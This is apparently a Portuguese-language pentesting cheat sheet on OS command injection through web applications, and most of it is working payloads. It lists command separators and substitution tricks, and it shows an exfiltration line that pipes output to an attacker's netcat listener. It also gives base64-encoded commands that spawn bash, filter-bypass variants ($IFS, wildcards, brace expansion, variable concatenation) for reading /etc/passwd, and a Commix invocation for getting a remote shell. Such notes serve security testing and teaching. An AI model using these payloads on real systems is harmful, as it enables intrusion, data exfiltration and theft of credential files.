Command Injection

Assim como vários outros tipos de injections, este também executa comandos porém diretamente no SO através de uma aplicação web.

Inserindo Comandos

Quando a aplicação web nos permite inserir alguma string e este vira um comando no SO, podemos adicionar um dos caracteres ;, |, ||, &, &&, %0a, \n e 0x0a (esse dois último servem para dar uma quebra de linha) para inserir comandos arbitrários. Por exemplo:

pwd ; ls
pwd | ls
pwd || ls
pwd & ls
pwd && ls
pwd %0a ls
pwd \n ls
pwd 0x0a ls

Deixando esse ataque um pouco mais avançado, podemos canalizar a saída para nosso host através do netcat.

# Atacante
nc -vlp <port>

# Alvo
; ls -la | nc <ip_hacker> <port>

Podemos também inserir comandos sem precisar dividí-lo em vários comandos. Para isso use um dos exemplos abaixo:

`<command>`
$(<command>)

# Os dois comandos abaixo perdem a funcionalidade quando tem um por exemplo um "echo" antes
'<command>'
"<command>"

# Atribuindo valor a variável
MYVAR=MyValue <command>

Há também como codificar em base64 e executar

$(echo <comando_em_base64> | base64 -d)

OBS.: Caso não queira executar os dois comandos, escreva tudo em uma só linha, irá dar um erro de sintaxe, porém irá conseguir executar os comandos, exemplo:

ping <ip> -c1 $(cat /etc/passwd)

Bypass em Qualquer Caractere Alfanumérico

Podemos substituir qualquer caractere alfanumérico substituindo por ?. Por exemplo, o comando cat /etc/passwd ficará cat /??c/p?ss??, /bin/bash ficará /??n/ba??. Coloque a ? onde quiser, desde que não coincida com dois ou mais arquivos compatíveis com a mesma expressão regular.

Bypass com Espaço

Algumas aplicações podem bloquear o caractere de espaço mas podemos contornar isso utilizando o IFS (Internal Field Separator), que é uma variável de ambiente de espaço

cat$IFS/etc/passwd
cat${IFS}/etc/passwd
{echo,bXlzdGhlcgo=}|{base64,-d}
{ls,-lha,/etc/passwd}
{cat,/etc/pas?w?}
bash${IFS}-c${IFS}"{echo,aWQK}|{base64,-d}|{bash,-i}"
{bash,-c,id}

Também podemos fazer de outra maneira, utilizando no mínimo dois comandos, como nos exemplos abaixo:

{echo,i,am,mysther}
{ls,-lha}
{cat,/etc/passwd}

O Linux também permite chamar um determinado comando a passar o nome do arquivo para ele, como nos exemplos abaixo

cat</etc/passwd
cat<$x$x/$x$x/$x$x/$x$x/etc/passwd
IFS=,;`cat<<<cat,/etc/passwd`

Criando variáveis que contém partes de um comando e depois executando, também pode ser uma boa maneira de executar códigos

c=cat
a=/et
Z=c
a=$a$Z
Z=/
a=$a$Z
Z=p
a=$a$Z
Z=a
a=$a$Z
Z=s
a=$a$Z
a=$a$Z
Z=w
a=$a$Z
Z=d
a=$a$Z
$c<$a

Commix

Commix é uma ferramenta que gera uma shell, baseando em uma URL que permite inserir comandos no SO. Utilize o comando abaixo para ter um shell do servidor alvo:

python commix.py -u http://sitevulneravel/vulnerabilities/ --data="ip=INJECTION_HERE&submit=submit" --cookie="<cookie>"

Observe que o parâmetro ip está com o valor INJECTION HERE, pois é neste campo que o Commix irá utilizar para inserir o payload para fazer a shell remota.

Sites

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command Injection